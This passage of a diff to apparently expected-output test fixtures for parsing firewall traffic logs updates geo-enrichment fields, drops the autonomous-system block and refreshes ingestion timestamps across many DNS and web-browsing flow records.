04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", @@ -6418,26 +6188,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6533,7 +6298,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381872100Z", + "ingested": "2021-12-14T14:50:18.748410757Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6558,26 +6323,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6673,7 +6433,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381877500Z", + "ingested": "2021-12-14T14:50:18.748411108Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6698,26 +6458,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6813,7 +6568,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381882800Z", + "ingested": "2021-12-14T14:50:18.748411459Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6838,26 +6593,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 316, - "ip": "175.16.199.1", - "packets": 2 + "packets": 2, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -6953,7 +6703,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381886700Z", + "ingested": "2021-12-14T14:50:18.748411806Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -6978,26 +6728,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 121, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7093,7 +6838,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381891200Z", + "ingested": "2021-12-14T14:50:18.748412263Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7118,26 +6863,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 169, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7233,7 +6973,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381896600Z", + "ingested": "2021-12-14T14:50:18.748412605Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7258,26 +6998,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 954, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7373,7 +7108,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381900600Z", + "ingested": "2021-12-14T14:50:18.748412953Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7398,26 +7133,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 9130, - "ip": "175.16.199.1", - "packets": 10 + "packets": 10, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7513,7 +7243,7 @@ }, "event": { "duration": 2000000000, - "ingested": "2021-12-09T13:43:22.381904700Z", + "ingested": "2021-12-14T14:50:18.748413362Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7538,26 +7268,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 555, - "ip": "175.16.199.1", - "packets": 3 + "packets": 3, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7653,7 +7378,7 @@ }, "event": { "duration": 512000000000, - "ingested": "2021-12-09T13:43:22.381909600Z", + "ingested": "2021-12-14T14:50:18.748413779Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,11964,1,56856,80,0,0,0x200000,tcp,allow,1918,1363,555,21,2012/04/10 04:29:51,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7678,26 +7403,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7793,7 +7513,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381914100Z", + "ingested": "2021-12-14T14:50:18.748414115Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26502,1,52489,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7818,26 +7538,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -7933,7 +7648,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381917700Z", + "ingested": "2021-12-14T14:50:18.748414463Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26338,1,59298,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -7958,26 +7673,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8073,7 +7783,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381922200Z", + "ingested": "2021-12-14T14:50:18.748414823Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24919,1,60185,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8098,26 +7808,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8213,7 +7918,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381927700Z", + "ingested": "2021-12-14T14:50:18.748415165Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26731,1,51817,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8238,26 +7943,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 40043, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8353,7 +8053,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381933Z", + "ingested": "2021-12-14T14:50:18.748415547Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,skype-probe,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26504,1,47752,40043,0,0,0x200000,udp,allow,186,186,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8378,26 +8078,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8493,7 +8188,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381936600Z", + "ingested": "2021-12-14T14:50:18.748415887Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25543,1,59297,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8518,26 +8213,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8633,7 +8323,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381940400Z", + "ingested": "2021-12-14T14:50:18.748416248Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,21948,1,52537,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8658,26 +8348,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8773,7 +8458,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381944600Z", + "ingested": "2021-12-14T14:50:18.748416594Z", "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,26279,1,53155,53,0,0,0x200000,udp,allow,82,82,0,1,2012/04/10 04:39:52,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", @@ -8798,26 +8483,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 906, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -8913,7 +8593,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381948800Z", + "ingested": "2021-12-14T14:50:18.748416936Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24894,1,59197,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:21,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -8938,26 +8618,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 163, - "ip": "175.16.199.1", - "packets": 1 + "packets": 1, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9053,7 +8728,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381953400Z", + "ingested": "2021-12-14T14:50:18.748417299Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9078,26 +8753,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9193,7 +8863,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381958800Z", + "ingested": "2021-12-14T14:50:18.748417642Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9218,26 +8888,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9333,7 +8998,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381964500Z", + "ingested": "2021-12-14T14:50:18.748417987Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9358,26 +9023,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9473,7 +9133,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:43:22.381969900Z", + "ingested": "2021-12-14T14:50:18.748418381Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9498,26 +9158,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Italy", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "bytes": 922, - "ip": "175.16.199.1", - "packets": 7 + "packets": 7, + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -9613,7 +9268,7 @@ }, "event": { "duration": 1000000000, - "ingested": "2021-12-09T13:43:22.381975300Z", + "ingested": "2021-12-14T14:50:18.748418723Z", "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", @@ -9638,26 +9293,21 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - 